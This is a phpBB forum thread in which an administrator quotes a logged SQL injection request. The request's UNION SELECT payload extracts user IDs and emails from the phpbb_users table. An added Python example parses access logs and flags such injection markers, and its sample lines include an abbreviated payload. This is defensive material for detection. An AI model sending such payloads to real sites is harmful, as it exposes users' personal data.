
Where is this query from

Posted: Tue Nov 30, 2010 2:33 pm
by Ciao121
Hi,
today I have a high load on my server and I saw many queries like this one:
"SELECT forum_id FROM phpbb_posts where post_id=5192068 and 5=6 union select concat....."
Seems a strange query to me (what does "5=6" mean?)... :shock:

Re: Where is this query from

Posted: Tue Nov 30, 2010 2:41 pm
by Ciao121
Found an HTTP call like this:
"GET /viewtopic.php?p=5192068%20and%205=6%20union%20select%20concat(0x5E252421,ifnull(`user_id`,0x4E554C4C),char(9),ifnull(`user_email`,0x4E554C4C),char(9),0x2A5B7D2F)%20from%20`phpbb`.`phpbb_users`%20limit%20255769,1%20%20-- HTTP/1.1"

What is this "user" trying to do???
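
Added example, not part of the original post and not phpBB code: a small access-log check that URL-decodes the request target and flags a `p` value that is not a plain integer, which is what separates the request above from a normal viewtopic.php call. The marker labels, the `NUMERIC_PARAMS` set and the sample lines in the usage comment are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters expected to hold an integer id (assumption: only `p`, which the
# logged query on this page maps to post_id).
NUMERIC_PARAMS = {"p"}

# Request line as written in a common access log: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"?(?P<method>[A-Z]+) (?P<target>.+) HTTP/[\d.]+"?')

# Labels are illustrative; each pattern is matched against the decoded value.
SQL_MARKERS = [
    # "and 5=6" is always false: the original SELECT returns no rows, so
    # only the rows from the appended UNION branch come back.
    ("constant comparison", re.compile(r"\band\s+\d+\s*=\s*\d+", re.I)),
    ("union select", re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)),
    ("hex literal", re.compile(r"\b0x[0-9a-f]+\b", re.I)),
    ("trailing comment", re.compile(r"--\s*$")),
]

def inspect_request(log_line):
    """Return [(param, decoded_value, [marker labels])] for every numeric
    parameter whose decoded value is not made of digits only."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    query = urlsplit(match.group("target")).query
    findings = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name in NUMERIC_PARAMS and not re.fullmatch(r"[0-9]+", value):
            labels = [label for label, rx in SQL_MARKERS if rx.search(value)]
            findings.append((name, value, labels))
    return findings

if __name__ == "__main__":
    # Constructed sample lines; the second abbreviates the request in the post.
    samples = [
        '"GET /viewtopic.php?p=5192068 HTTP/1.1"',
        '"GET /viewtopic.php?p=5192068%20and%205=6%20union%20select'
        '%20concat(0x41)%20-- HTTP/1.1"',
    ]
    for line in samples:
        for name, value, labels in inspect_request(line):
            print(f"suspicious {name}={value!r}: {', '.join(labels)}")
```

The digits-only test is the reliable signal here; the marker labels only help triage which requests to look at first.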

Re: Where is this query from

Posted: Tue Nov 30, 2010 2:51 pm
by Brf
Please repost this on the security tracker: http://www.phpbb.com/security/phpbb3/